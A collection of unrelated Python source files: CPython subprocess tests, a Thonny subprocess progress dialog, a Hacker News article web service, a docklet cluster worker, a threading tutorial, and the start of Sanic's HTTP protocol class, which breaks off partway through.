process.wait()
self.assertEqual([], self.RecordingPopen.instances_created)
def test_call_keyboardinterrupt_no_kill(self):
self._test_keyboardinterrupt_no_kill(subprocess.call, timeout=6.282)
def test_run_keyboardinterrupt_no_kill(self):
self._test_keyboardinterrupt_no_kill(subprocess.run, timeout=6.282)
def test_context_manager_keyboardinterrupt_no_kill(self):
def popen_via_context_manager(*args, **kwargs):
with subprocess.Popen(*args, **kwargs) as unused_process:
raise KeyboardInterrupt # Test how __exit__ handles ^C.
self._test_keyboardinterrupt_no_kill(popen_via_context_manager)
def test_getoutput(self):
self.assertEqual(subprocess.getoutput('echo xyzzy'), 'xyzzy')
self.assertEqual(subprocess.getstatusoutput('echo xyzzy'),
(0, 'xyzzy'))
# we use mkdtemp in the next line to create an empty directory
# under our exclusive control; from that, we can invent a pathname
# that we _know_ won't exist. This is guaranteed to fail.
dir = None
try:
dir = tempfile.mkdtemp()
name = os.path.join(dir, "foo")
status, output = subprocess.getstatusoutput(
("type " if mswindows else "cat ") + name)
self.assertNotEqual(status, 0)
finally:
if dir is not None:
os.rmdir(dir)
def test__all__(self):
"""Ensure that __all__ is populated properly."""
intentionally_excluded = {"list2cmdline", "Handle", "pwd", "grp", "fcntl"}
exported = set(subprocess.__all__)
possible_exports = set()
import types
for name, value in subprocess.__dict__.items():
if name.startswith('_'):
continue
if isinstance(value, (types.ModuleType,)):
continue
possible_exports.add(name)
self.assertEqual(exported, possible_exports - intentionally_excluded)
@unittest.skipUnless(hasattr(selectors, 'PollSelector'),
"Test needs selectors.PollSelector")
class ProcessTestCaseNoPoll(ProcessTestCase):
def setUp(self):
self.orig_selector = subprocess._PopenSelector
subprocess._PopenSelector = selectors.SelectSelector
ProcessTestCase.setUp(self)
def tearDown(self):
subprocess._PopenSelector = self.orig_selector
ProcessTestCase.tearDown(self)
@unittest.skipUnless(mswindows, "Windows-specific tests")
class CommandsWithSpaces (BaseTestCase):
def setUp(self):
super().setUp()
f, fname = tempfile.mkstemp(".py", "te st")
self.fname = fname.lower ()
os.write(f, b"import sys;"
b"sys.stdout.write('%d %s' % (len(sys.argv), [a.lower () for a in sys.argv]))"
)
os.close(f)
def tearDown(self):
os.remove(self.fname)
super().tearDown()
def with_spaces(self, *args, **kwargs):
kwargs['stdout'] = subprocess.PIPE
p = subprocess.Popen(*args, **kwargs)
with p:
self.assertEqual(
p.stdout.read ().decode("mbcs"),
"2 [%r, 'ab cd']" % self.fname
)
def test_shell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"), shell=1)
def test_shell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"], shell=1)
def test_noshell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"))
def test_noshell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"])
class ContextManagerTests(BaseTestCase):
def test_pipe(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write('stdout');"
"sys.stderr.write('stderr');"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
self.assertEqual(proc.stdout.read(), b"stdout")
self.assertEqual(proc.stderr.read(), b"stderr")
self.assertTrue(proc.stdout.closed)
self.assertTrue(proc.stderr.closed)
def test_returncode(self):
with subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(100)"]) as proc:
pass
# __exit__ calls wait(), so the returncode should be set
self.assertEqual(proc.returncode, 100)
def test_communicate_stdin(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.exit(sys.stdin.read() == 'context')"],
stdin=subprocess.PIPE) as proc:
proc.communicate(b"context")
self.assertEqual(proc.returncode, 1)
def test_invalid_args(self):
with self.assertRaises(NONEXISTING_ERRORS):
with subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
def test_broken_pipe_cleanup(self):
"""Broken pipe error should not prevent wait() (Issue 21619)"""
proc = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE,
bufsize=support.PIPE_MAX_SIZE*2)
proc = proc.__enter__()
# Prepare to send enough data to overflow any OS pipe buffering and
# guarantee a broken pipe error. Data is held in BufferedWriter
# buffer until closed.
proc.stdin.write(b'x' * support.PIPE_MAX_SIZE)
self.assertIsNone(proc.returncode)
# EPIPE expected under POSIX; EINVAL under Windows
self.assertRaises(OSError, proc.__exit__, None, None, None)
self.assertEqual(proc.returncode, 0)
self.assertTrue(proc.stdin.closed)
if __name__ == "__main__":
unittest.main()
|
workdlg.py
|
import logging
import os
import queue
import signal
import subprocess
import threading
import time
import tkinter as tk
from tkinter import ttk, messagebox
from typing import Optional
from thonny import tktextext
from thonny.languages import tr
from thonny.misc_utils import running_on_windows
from thonny.ui_utils import CommonDialog, ems_to_pixels, create_action_label, set_text_if_different
logger = logging.getLogger(__name__)
class WorkDialog(CommonDialog):
def __init__(self, master, autostart=False):
super(WorkDialog, self).__init__(master)
self._autostart = autostart
self._state = "idle"
self.success = False
self._work_events_queue = queue.Queue()
self.init_instructions_frame()
self.init_main_frame()
self.init_action_frame()
self.init_log_frame()
self.populate_main_frame()
self.rowconfigure(4, weight=1) # log frame
self.columnconfigure(0, weight=1)
self.title(self.get_title())
self.stdout = ""
self.stderr = ""
self._update_scheduler = None
self._keep_updating_ui()
self.bind("<Escape>", self.on_cancel, True)
self.protocol("WM_DELETE_WINDOW", self.on_cancel)
if self._autostart:
self.on_ok()
def populate_main_frame(self):
pass
def is_ready_for_work(self):
return True
def init_instructions_frame(self):
instructions = self.get_instructions()
self.instructions_frame = ttk.Frame(self, style="Tip.TFrame")
self.instructions_frame.grid(row=0, column=0, sticky="nsew")
self.instructions_frame.rowconfigure(0, weight=1)
self.instructions_frame.columnconfigure(0, weight=1)
pad = self.get_padding()
self.instructions_label = ttk.Label(self, style="Tip.TLabel", text=instructions)
self.instructions_label.grid(row=0, column=0, sticky="w", padx=pad, pady=pad)
def get_instructions(self) -> Optional[str]:
return None
def init_main_frame(self):
self.main_frame = ttk.Frame(self)
self.main_frame.grid(row=1, column=0, sticky="nsew")
def init_action_frame(self):
padding = self.get_padding()
intpad = self.get_internal_padding()
self.action_frame = ttk.Frame(self)
self.action_frame.grid(row=2, column=0, sticky="nsew")
self._progress_bar = ttk.Progressbar(
self.action_frame, length=ems_to_pixels(4), mode="indeterminate"
)
self._current_action_label = create_action_label(
self.action_frame,
text="",
width=round(self.get_action_text_max_length() * 1.1),
click_handler=self.toggle_log_frame,
)
self._current_action_label.grid(
row=1, column=2, sticky="we", pady=padding, padx=(0, intpad)
)
self._ok_button = ttk.Button(
self.action_frame,
text=self.get_ok_text(),
command=self.on_ok,
state="disabled",
default="active",
)
if not self._autostart:
self._ok_button.grid(column=4, row=1, pady=padding, padx=(0, intpad))
self._cancel_button = ttk.Button(
self.action_frame,
text=self.get_cancel_text(),
command=self.on_cancel,
)
self._cancel_button.grid(column=5, row=1, padx=(0, padding), pady=padding)
self.action_frame.columnconfigure(2, weight=1)
def get_action_text_max_length(self):
return 35
def init_log_frame(self):
self.log_frame = ttk.Frame(self)
self.log_frame.columnconfigure(1, weight=1)
self.log_frame.rowconfigure(1, weight=1)
fixed_font = tk.font.nametofont("TkFixedFont")
font = fixed_font.copy()
font.configure(size=round(fixed_font.cget("size") * 0.8))
self.log_text = tktextext.TextFrame(
self.log_frame,
horizontal_scrollbar=False,
wrap="word",
borderwidth=1,
height=5,
width=20,
font=font,
read_only=True,
)
padding = self.get_padding()
self.log_text.grid(row=1, column=1, sticky="nsew", padx=padding, pady=(0, padding))
def update_ui(self):
if self._state == "closed":
return
while not self._work_events_queue.empty():
self.handle_work_event(*self._work_events_queue.get())
if self._state == "closed":
return
if self._state == "idle":
if self.is_ready_for_work():
self._ok_button.configure(state="normal")
else:
self._ok_button.configure(state="disabled")
else:
self._ok_button.configure(state="disabled")
if self._state == "done":
set_text_if_different(self._cancel_button, tr("Close"))
else:
set_text_if_different(self._cancel_button, tr("Cancel"))
def start_work(self):
pass
def get_title(self):
return "Work dialog"
def _keep_updating_ui(self):
if self._state != "closed":
self.update_ui()
self._update_scheduler = self.after(200, self._keep_updating_ui)
else:
self._update_scheduler = None
def close(self):
self._state = "closed"
if self._update_scheduler is not None:
try:
self.after_cancel(self._update_scheduler)
except tk.TclError:
pass
self.destroy()
def cancel_work(self):
# worker should periodically check this value
self._state = "cancelling"
self.set_action_text(tr("Cancelling"))
def toggle_log_frame(self, event=None):
if self.log_frame.winfo_ismapped():
self.log_frame.grid_forget()
self.rowconfigure(2, weight=1)
self.rowconfigure(4, weight=0)
else:
self.log_frame.grid(row=4, column=0, sticky="nsew")
self.rowconfigure(2, weight=0)
self.rowconfigure(4, weight=1)
def get_ok_text(self):
return tr("OK")
def get_cancel_text(self):
return tr("Cancel")
def on_ok(self, event=None):
assert self._state == "idle"
if self.start_work() is not False:
self._state = "working"
self.success = False
self.grid_progress_widgets()
self._progress_bar["mode"] = "indeterminate"
self._progress_bar.start()
if not self._current_action_label["text"]:
self._current_action_label["text"] = tr("Starting") + "..."
def grid_progress_widgets(self):
padding = self.get_padding()
intpad = self.get_internal_padding()
self._progress_bar.grid(row=1, column=1, sticky="w", padx=(padding, intpad), pady=padding)
def on_cancel(self, event=None):
if self._state in ("idle", "done"):
self.close()
elif self._state == "cancelling" and self.confirm_leaving_while_cancelling():
self.close()
elif self.confirm_cancel():
self.cancel_work()
def confirm_leaving_while_cancelling(self):
return messagebox.askyesno(
"Close dialog?",
"Cancelling is in progress.\nDo you still want to close the dialog?",
parent=self,
)
def confirm_cancel(self):
return messagebox.askyesno(
"Cancel work?",
"Are you sure you want to cancel?",
parent=self,
)
def append_text(self, text: str, stream_name="stdout") -> None:
"""Appends text to the details box. May be called from another thread."""
self._work_events_queue.put(("append", (text, stream_name)))
setattr(self, stream_name, getattr(self, stream_name) + text)
def replace_last_line(self, text: str, stream_name="stdout") -> None:
"""Replaces last line in the details box. May be called from another thread."""
self._work_events_queue.put(("replace", (text, stream_name)))
setattr(self, stream_name, getattr(self, stream_name) + text)
def report_progress(self, value: float, maximum: float) -> None:
"""Updates progress bar. May be called from another thread."""
self._work_events_queue.put(("progress", (value, maximum)))
def set_action_text(self, text: str) -> None:
"""Updates text above the progress bar. May be called from another thread."""
self._work_events_queue.put(("action", (text,)))
def set_action_text_smart(self, text: str) -> None:
"""Updates text above the progress bar. May be called from another thread."""
text = text.strip()
if not text:
return
if len(text) > self.get_action_text_max_length():
text = text[: self.get_action_text_max_length() - 3] + "..."
self.set_action_text(text)
def report_done(self, success):
"""May be called from another thread."""
self._work_events_queue.put(("done", (success,)))
def handle_work_event(self, type, args):
if type in ("append", "replace"):
text, stream_name = args
if type == "replace":
self.log_text.text.direct_delete("end-1c linestart", "end-1c")
self.log_text.text.direct_insert("end", text, (stream_name,))
self.log_text.text.see("end")
elif type == "action":
set_text_if_different(self._current_action_label, args[0])
elif type == "progress":
value, maximum = args
if value is None or maximum is None:
if self._progress_bar["mode"] != "indeterminate":
self._progress_bar["mode"] = "indeterminate"
self._progress_bar.start()
else:
if self._progress_bar["mode"] != "determinate":
self._progress_bar["mode"] = "determinate"
self._progress_bar.stop()
self._progress_bar.configure(value=value, maximum=maximum)
elif type == "done":
self.on_done(args[0])
def on_done(self, success):
"""NB! Don't call from non-ui thread!"""
self.success = success
if self.success:
self._state = "done"
self._cancel_button.focus_set()
self._cancel_button["default"] = "active"
self._ok_button["default"] = "normal"
elif self._autostart:
# Can't try again if failed with autostart
self._state = "done"
self._cancel_button.focus_set()
self._cancel_button["default"] = "active"
self._ok_button["default"] = "normal"
else:
# allows trying again when failed
self._state = "idle"
self._ok_button.focus_set()
self._ok_button["default"] = "active"
self._cancel_button["default"] = "normal"
self._progress_bar.stop()
# need to put to determinate mode, otherwise it looks half done
self._progress_bar["mode"] = "determinate"
if self.success and self._autostart:
self.close()
class SubprocessDialog(WorkDialog):
"""Shows incrementally the output of given subprocess.
Allows cancelling"""
def __init__(self, master, proc, title, long_description=None, autostart=True):
self._proc = proc
self.stdout = ""
self.stderr = ""
self._stdout_thread = None
self._stderr_thread = None
self._title = title
self._long_description = long_description
self.returncode = None
super().__init__(master, autostart=autostart)
def is_ready_for_work(self):
return True
def get_title(self):
return self._title
def get_instructions(self) -> Optional[str]:
return self._long_description
def start_work(self):
self._start_listening_current_proc()
def _start_listening_current_proc(self):
def listen_stream(stream_name):
stream = getattr(self._proc, stream_name)
while True:
data = stream.readline()
self.append_text(data, stream_name)
self._check_set_action_text_from_output_line(data)
setattr(self, stream_name, getattr(self, stream_name) + data)
if data == "":
logger.debug("Finished reading %s", stream_name)
break
if stream_name == "stdout":
self._finish_process()
logger.debug("Returning from reading %s", stream_name)
self._stdout_thread = threading.Thread(target=listen_stream, args=["stdout"], daemon=True)
self._stdout_thread.start()
if self._proc.stderr is not None:
self._stderr_thread = threading.Thread(
target=listen_stream, args=["stderr"], daemon=True
)
self._stderr_thread.start()
def _finish_process(self):
self.returncode = self._proc.wait()
logger.debug("Process ended with returncode %s", self.returncode)
if self.returncode:
self.set_action_text("Error")
self.append_text("Error: process returned with code %s\n" % self.returncode)
else:
self.set_action_text("Done!")
self.append_text("Done!")
self.report_done(self.returncode == 0)
def get_action_text_max_length(self):
return 35
def _check_set_action_text_from_output_line(self, line):
if len(line) > self.get_action_text_max_length():
line = line[: self.get_action_text_max_length() - 3].strip() + "..."
if line:
self.set_action_text(line.strip())
def cancel_work(self):
super().cancel_work()
# try gently first
try:
try:
if running_on_windows():
os.kill(self._proc.pid, signal.CTRL_BREAK_EVENT) # pylint: disable=no-member
else:
os.kill(self._proc.pid, signal.SIGINT)
self._proc.wait(2)
except subprocess.TimeoutExpired:
if self._proc.poll() is None:
# now let's be more concrete
self._proc.kill()
except OSError as e:
messagebox.showerror("Error", "Could not kill subprocess: " + str(e), master=self)
logger.error("Could not kill subprocess", exc_info=e)
|
python_web_service.py
|
from hackernews import HackerNews
import json
import numpy as np
import unicodedata
import random
import string
import cherrypy
import Queue
import threading
class article:
url = ""
title = ""
article_id = 0
article_vector = None
mod_weight = 0.1
def __init__(self, url, title, article_id):
self.url = url
self.title = title
self.article_id = article_id
# create 1000 dimensional row vector, with entries between 0 and 1
random_vector = np.random.rand(1, 1000)
# normalize vector
vec_sum = np.sum(random_vector)
self.article_vector = random_vector / vec_sum
# return the article vector in a json friendly format
def as_dict(self):
retValue = dict()
retValue['url'] = self.url
retValue['title'] = self.title
retValue['article_id'] = self.article_id
retValue['article_vector'] = np.array(self.article_vector).tolist()
return retValue
# If a user with user_vector as user vector clicks this article then modify the article vector as follows
def mod_article_vector(self, user_vector):
user_vector = self.mod_weight * user_vector
tmp_vector = self.article_vector + user_vector
tmp_vector = tmp_vector / (1 + self.mod_weight)
self.article_vector = tmp_vector
class pollArticles:
cached_articles = dict()
article_limit = 30
articles_as_json = json.loads('{}')
def getHN_stories(self, article_limit):
hn = HackerNews()
articles_to_retrieve = int(article_limit*1.5)
top_story_ids = hn.top_stories(limit=articles_to_retrieve)
stories = []
for story_id in top_story_ids:
stories.append(hn.get_item(story_id))
return stories
def HNstories_toArtList(self, stories, article_limit):
articles = []
counter = 0
for x in stories:
#print x
if counter == article_limit:
break
unicode_url = x.url
unicode_title = x.title
str_url = unicode_url.encode('ascii', 'ignore')
str_title = unicode_title.encode('ascii', 'ignore')
if str_url != "":
new_article = article(str_url, str_title, x.item_id)
articles.append(new_article)
counter += 1
return articles
def convertArticlesToArtDict(self, articles, cached_articles):
new_cached_articles = dict()
for art in articles:
if art.url in cached_articles:
new_cached_articles[art.article_id] = cached_articles[art.article_id]
else:
new_cached_articles[art.article_id] = art
return new_cached_articles
def poll_articles(self):
hn_stories = self.getHN_stories(self.article_limit)
hn_articles = self.HNstories_toArtList(hn_stories, self.article_limit)
self.cached_articles = self.convertArticlesToArtDict(hn_articles, self.cached_articles)
self.save_articles_to_json()
def save_articles_to_json(self):
article_keys = self.cached_articles.keys()
article_list = []
for x in article_keys:
article_object = self.cached_articles[x]
article_list.append(article_object.as_dict())
#with open('./web/data/top_articles.json', 'w') as outfile:
# json.dump(article_list, outfile)
self.articles_as_json = json.dumps(article_list)
print ("LOL")
#TODO handle the case when the article_id does not exist server side
def receive_user_action(self, user_vector, article_id):
if article_id in self.cached_articles:
article_to_mod = self.cached_articles[article_id]
article_to_mod.mod_article_vector(user_vector)
self.cached_articles[article_id] = article_to_mod
self.save_articles_to_json()
def threadedFunctionality(backEnd, userActions):
while(True):
if not userActions.empty():
local_set = userActions.get()
backEnd.receive_user_action(local_set[0], local_set[1])
class PythonBackEnd(object):
backEnd = pollArticles()
backEnd.poll_articles()
userActions = Queue.Queue()
t = threading.Thread(target=threadedFunctionality, args=(backEnd, userActions))
t.start()
exposed = True
def GET(self):
return self.backEnd.articles_as_json
def POST(self, user_vector, article_id):
if (int(article_id)):
userVector = json.loads(user_vector)
userVector = np.array(userVector)
print (article_id)
self.userActions.put([userVector, int(article_id)])
#self.backEnd.receive_user_action(userVector, int(article_id))
return
if __name__ == '__main__':
conf = {
'/': {
'request.dispatch': cherrypy.dispatch.MethodDispatcher(),
'tools.response_headers.on': True,
'tools.response_headers.headers': [('Content-Type', 'text/plain')],
}
}
cherrypy.quickstart(PythonBackEnd(), '/', conf)
#backEnd = pollArticles()
#backEnd.poll_articles()
# test case
#uv = np.zeros((1,1000))
#uv[0,999] = 1
#vvar = 10152735
#backEnd.receive_user_action(uv, vvar)
|
worker.py
|
#!/usr/bin/python3
# first init env
import env, tools
config = env.getenv("CONFIG")
tools.loadenv(config)
# must import logger after initlogging, ugly
from log import initlogging
initlogging("docklet-worker")
from log import logger
import xmlrpc.server, sys, time
from socketserver import ThreadingMixIn
import threading
import etcdlib, network, container
from nettools import netcontrol
import monitor
from lvmtool import new_group, recover_group
import psutil
##################################################################
# Worker
# Description : Worker starts at worker node to listen rpc request and complete the work
# Init() :
# get master ip
# initialize rpc server
# register rpc functions
# initialize network
# initialize lvm group
# Start() :
# register in etcd
# setup GRE tunnel
# start rpc service
##################################################################
# imitate etcdlib to genernate the key of etcdlib manually
def generatekey(path):
clustername = env.getenv("CLUSTER_NAME")
return '/'+clustername+'/'+path
class ThreadXMLRPCServer(ThreadingMixIn,xmlrpc.server.SimpleXMLRPCServer):
pass
class Worker(object):
def __init__(self, etcdclient, addr, port):
self.addr = addr
self.port = port
logger.info ("begin initialize on %s" % self.addr)
self.fspath = env.getenv('FS_PREFIX')
self.poolsize = env.getenv('DISKPOOL_SIZE')
self.etcd = etcdclient
self.master = self.etcd.getkey("service/master")[1]
self.mode=None
# waiting state is preserved for compatible.
self.etcd.setkey("machines/runnodes/"+self.addr, "waiting")
# get this node's key to judge how to init.
[status, key] = self.etcd.getkey("machines/runnodes/"+self.addr)
if status:
self.key = generatekey("machines/allnodes/"+self.addr)
else:
logger.error("get key failed. %s" % 'machines/runnodes/'+self.addr)
sys.exit(1)
# check token to check global directory
[status, token_1] = self.etcd.getkey("token")
tokenfile = open(self.fspath+"/global/token", 'r')
token_2 = tokenfile.readline().strip()
if token_1 != token_2:
logger.error("check token failed, global directory is not a shared filesystem")
sys.exit(1)
logger.info ("worker registered and checked the token")
# worker search all run nodes to judge how to init
# If the node in all node list, we will recover it.
# Otherwise, this node is new added in.
value = 'init-new'
[status, alllist] = self.etcd.listdir("machines/allnodes")
for node in alllist:
if node['key'] == self.key:
value = 'init-recovery'
break
logger.info("worker start in "+value+" mode")
Containers = container.Container(self.addr, etcdclient)
if value == 'init-new':
logger.info ("init worker with mode:new")
self.mode='new'
# check global directory do not have containers on this worker
[both, onlylocal, onlyglobal] = Containers.diff_containers()
if len(both+onlyglobal) > 0:
logger.error ("mode:new will clean containers recorded in global, please check")
sys.exit(1)
[status, info] = Containers.delete_allcontainers()
if not status:
logger.error ("delete all containers failed")
sys.exit(1)
# create new lvm VG at last
new_group("docklet-group",self.poolsize,self.fspath+"/local/docklet-storage")
#subprocess.call([self.libpath+"/lvmtool.sh", "new", "group", "docklet-group", self.poolsize, self.fspath+"/local/docklet-storage"])
elif value == 'init-recovery':
logger.info ("init worker with mode:recovery")
self.mode='recovery'
# recover lvm VG first
recover_group("docklet-group",self.fspath+"/local/docklet-storage")
#subprocess.call([self.libpath+"/lvmtool.sh", "recover", "group", "docklet-group", self.fspath+"/local/docklet-storage"])
[status, meg] = Containers.check_allcontainers()
if status:
logger.info ("all containers check ok")
else:
logger.info ("not all containers check ok")
#sys.exit(1)
else:
logger.error ("worker init mode:%s not supported" % value)
sys.exit(1)
# initialize rpc
# xmlrpc.server.SimpleXMLRPCServer(addr) -- addr : (ip-addr, port)
# if ip-addr is "", it will listen ports of all IPs of this host
logger.info ("initialize rpcserver %s:%d" % (self.addr, int(self.port)))
# logRequests=False : not print rpc log
#self.rpcserver = xmlrpc.server.SimpleXMLRPCServer((self.addr, self.port), logRequests=False)
self.rpcserver = ThreadXMLRPCServer((self.addr, int(self.port)), allow_none=True, logRequests=False)
self.rpcserver.register_introspection_functions()
self.rpcserver.register_instance(Containers)
self.rpcserver.register_function(monitor.workerFetchInfo)
# register functions or instances to server for rpc
#self.rpcserver.register_function(function_name)
# init collector to collect monitor infomation
self.con_collector = monitor.Container_Collector()
self.hosts_collector = monitor.Collector()
# initialize the network
# if worker and master run on the same node, reuse bridges
# don't need to create new bridges
if (self.addr == self.master):
logger.info ("master also on this node. reuse master's network")
else:
logger.info ("initialize network")
# 'docklet-br' of worker do not need IP Addr.
#[status, result] = self.etcd.getkey("network/workbridge")
#if not status:
# logger.error ("get bridge IP failed, please check whether master set bridge IP for worker")
#self.bridgeip = result
# create bridges for worker
#network.netsetup("init", self.bridgeip)
if self.mode == 'new':
if netcontrol.bridge_exists('docklet-br'):
netcontrol.del_bridge('docklet-br')
netcontrol.new_bridge('docklet-br')
else:
if not netcontrol.bridge_exists('docklet-br'):
logger.error("docklet-br not found")
sys.exit(1)
logger.info ("setup GRE tunnel to master %s" % self.master)
#network.netsetup("gre", self.master)
if not netcontrol.gre_exists('docklet-br', self.master):
netcontrol.setup_gre('docklet-br', self.master)
# start service of worker
def start(self):
# start collector
self.con_collector.start()
self.hosts_collector.start()
logger.info("Monitor Collector has been started.")
# worker change it state itself. Independedntly from master.
self.etcd.setkey("machines/runnodes/"+self.addr, "work")
self.etcd.setkey("cpus/"+self.addr,psutil.cpu_count())
self.etcd.setkey("mems/"+self.addr,str(int(psutil.virtual_memory().total/1024/1024)))
self.thread_sendheartbeat = threading.Thread(target=self.sendheartbeat)
self.thread_sendheartbeat.start()
# start serving for rpc
logger.info ("begins to work")
self.rpcserver.serve_forever()
# send heardbeat package to keep alive in etcd, ttl=2s
def sendheartbeat(self):
while(True):
# check send heartbeat package every 1s
time.sleep(1)
[status, value] = self.etcd.getkey("machines/runnodes/"+self.addr)
if status:
# master has know the worker so we start send heartbeat package
if value=='ok':
self.etcd.setkey("machines/runnodes/"+self.addr, "ok", ttl = 2)
else:
logger.error("get key %s failed, master crashed or initialized. restart worker please." % self.addr)
sys.exit(1)
if __name__ == '__main__':
etcdaddr = env.getenv("ETCD")
logger.info ("using ETCD %s" % etcdaddr )
clustername = env.getenv("CLUSTER_NAME")
logger.info ("using CLUSTER_NAME %s" % clustername )
# get network interface
net_dev = env.getenv("NETWORK_DEVICE")
logger.info ("using NETWORK_DEVICE %s" % net_dev )
ipaddr = network.getip(net_dev)
if ipaddr is False:
logger.error("network device is not correct")
sys.exit(1)
else:
logger.info("using ipaddr %s" % ipaddr)
# init etcdlib client
try:
etcdclient = etcdlib.Client(etcdaddr, prefix = clustername)
except Exception:
logger.error ("connect etcd failed, maybe etcd address not correct...")
sys.exit(1)
else:
logger.info("etcd connected")
cpu_quota = env.getenv('CONTAINER_CPU')
logger.info ("using CONTAINER_CPU %s" % cpu_quota )
mem_quota = env.getenv('CONTAINER_MEMORY')
logger.info ("using CONTAINER_MEMORY %s" % mem_quota )
worker_port = env.getenv('WORKER_PORT')
logger.info ("using WORKER_PORT %s" % worker_port )
logger.info("Starting worker")
worker = Worker(etcdclient, addr=ipaddr, port=worker_port)
worker.start()
|
ThreadChapter10.py
|
# encoding:UTF-8
__author__ = 'Hope6537'
import threading
import time
# 新线程执行的代码:
def loop():
print 'thread %s is running...' % threading.current_thread().name
n = 0
while n < 5:
n = n + 1
print 'thread %s >>> %s' % (threading.current_thread().name, n)
time.sleep(1)
print 'thread %s ended.' % threading.current_thread().name
print 'thread %s is running...' % threading.current_thread().name
t = threading.Thread(target=loop, name='LoopThread')
# t.start()
# t.join()
print 'thread %s ended.' % threading.current_thread().name
# 线程协作更改变量
# 假定这是你的银行存款:
balance = 0
lock = threading.Lock()
# 如果我们要确保balance计算正确,就要给change_it()上一把锁,当某个线程开始执行change_it()时
def change_it(n):
# 先存后取,结果应该为0:
global balance
balance = balance + n
balance = balance - n
def run_thread(n):
for i in range(100000):
lock.acquire()
try:
# 放心地改吧:
change_it(n)
finally:
# 改完了一定要释放锁:
lock.release()
t1 = threading.Thread(target=run_thread, args=(5,))
t2 = threading.Thread(target=run_thread, args=(8,))
t1.start()
t2.start()
t1.join()
t2.join()
print balance
|
server.py
|
import asyncio
import os
import traceback
from collections import deque
from functools import partial
from inspect import isawaitable
from multiprocessing import Process
from signal import SIG_IGN, SIGINT, SIGTERM, Signals
from signal import signal as signal_func
from socket import SO_REUSEADDR, SOL_SOCKET, socket
from time import time
from httptools import HttpRequestParser # type: ignore
from httptools.parser.errors import HttpParserError # type: ignore
from sanic.compat import Header
from sanic.exceptions import (
HeaderExpectationFailed,
InvalidUsage,
PayloadTooLarge,
RequestTimeout,
ServerError,
ServiceUnavailable,
)
from sanic.log import access_logger, logger
from sanic.request import EXPECT_HEADER, Request, StreamBuffer
from sanic.response import HTTPResponse
try:
import uvloop # type: ignore
if not isinstance(asyncio.get_event_loop_policy(), uvloop.EventLoopPolicy):
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
except ImportError:
pass
class Signal:
stopped = False
class HttpProtocol(asyncio.Protocol):
"""
This class provides a basic HTTP implementation of the sanic framework.
"""
__slots__ = (
# app
"app",
# event loop, connection
"loop",
"transport",
"connections",
"signal",
# request params
"parser",
"request",
"url",
"headers",
# request config
"request_handler",
"request_timeout",
"response_timeout",
"keep_alive_timeout",
"request_max_size",
"request_buffer_queue_size",
"request_class",
"is_request_stream",
"router",
"error_handler",
# enable or disable access log purpose
"access_log",
# connection management
"_total_request_size",
"_request_timeout_handler",
"_response_timeout_handler",
"_keep_alive_timeout_handler",
"_last_request_time",
"_last_response_time",
"_is_stream_handler",
"_not_paused",
"_request_handler_task",
"_request_stream_task",
"_keep_alive",
"_header_fragment",
"state",
"_debug",
)
def __init__(
self,
*,
loop,
app,
request_handler,
error_handler,
signal=Signal(),
connections=None,
request_timeout=60,
response_timeout=60,
keep_alive_timeout=5,
request_max_size=None,
request_buffer_queue_size=100,
request_class=None,
access_log=True,
keep_alive=True,
is_request_stream=False,
router=None,
state=None,
debug=False,
**kwargs
):
self.loop = loop
self.app = app
self.transport = None
self.request = None
self.parser = None
self.url = None
self.headers = None
self.router = router
self.signal = signal
self.access_log = access_log
self.connections = connections if connections is not None else set()
self.request_handler = request_handler
self.error_handler = error_handler
self.request_timeout = request_timeout
self.request_buffer_queue_size = request_buffer_queue_size
self.response_timeout = response_timeout
self.keep_alive_timeout = keep_alive_timeout
self.request_max_size = request_max_size
self.request_class = request_class or Request
self.is_request_stream = is_request_stream
self._is_stream_handler = False
self._not_paused = asyncio.Event(loop=loop)
self._total_request_size = 0
self._request_timeout_handler = None
self._response_timeout_handler = None
self._keep_alive_timeout_handler = None
self._last_request_time = None
self._last_response_time = None
self._request_handler_task = None
self._request_stream_task = None
self._keep_alive = keep_alive
self._header_fragment = b""
self.state = state if state else {}
if "requests_count" not in self.state:
self.state["requests_count"] = 0
self._debug = debug
self._not_paused.set()
self._body_chunks = deque()
@property
def keep_alive(self):
"""
Check if the connection needs to be kept alive based on the params
attached to the `_keep_alive` attribute, :attr:`Signal.stopped`
and :func:`HttpProtocol.parser.should_keep_alive`
:return: ``True`` if connection is to be kept alive ``False`` else
"""
return (
self._keep_alive
and not self.signal.stopped
and self.parser.should_keep_alive()
)
# -------------------------------------------- #
# Connection
# -------------------------------------------- #
def connection_made(self, transport):
self.connections.add(self)
self._request_timeout_handler = self.loop.call_later(
self.request_timeout, self.request_timeout_callback
)
self.transport = transport
self._last_request_time = time()
def connection_lost(self, exc):
self.connections.discard(self)
if self._request_handler_task:
self._request_handler_task.cancel()
if self._request_stream_task:
self._request_stream_task.cancel()
if self._request_timeout_handler:
self._request_timeout_handler.cancel()
if self._response_timeout_handler:
self._response_timeout_handler.cancel()
if self._keep_alive_timeout_handler:
self._keep_alive_timeout_handler.cancel()
def pause_writing(self):
self._not_paused.clear()
def resume_writing(self):
self._not_paused.set()
def request_timeout_callback(self):
# See the docstring in the RequestTimeout exception, to see
# exactly what this timeout is checking for.
# Check if elapsed time since request initiated exceeds our
# configured maximum request timeout value
time_elapsed = time() - self._last_request_time
if time_elapsed < self.request_timeout:
time_left = self.request_timeout - time_elapsed
self._request_timeout_handler = self.loop.call_later(
time_left, self.request_timeout_callback
)
else:
if self._request_stream_task:
self._request_stream_task.cancel()
if self._request_handler_task:
self._request_handler_task.cancel()
self.write_error(RequestTimeout("Request Timeout"))
def response_timeout_callback(self):
# Check if elapsed time since response was initiated exceeds our
# configured maximum request timeout value
time_elapsed = time() - self._last_request_time
if time_elapsed < self.response_timeout:
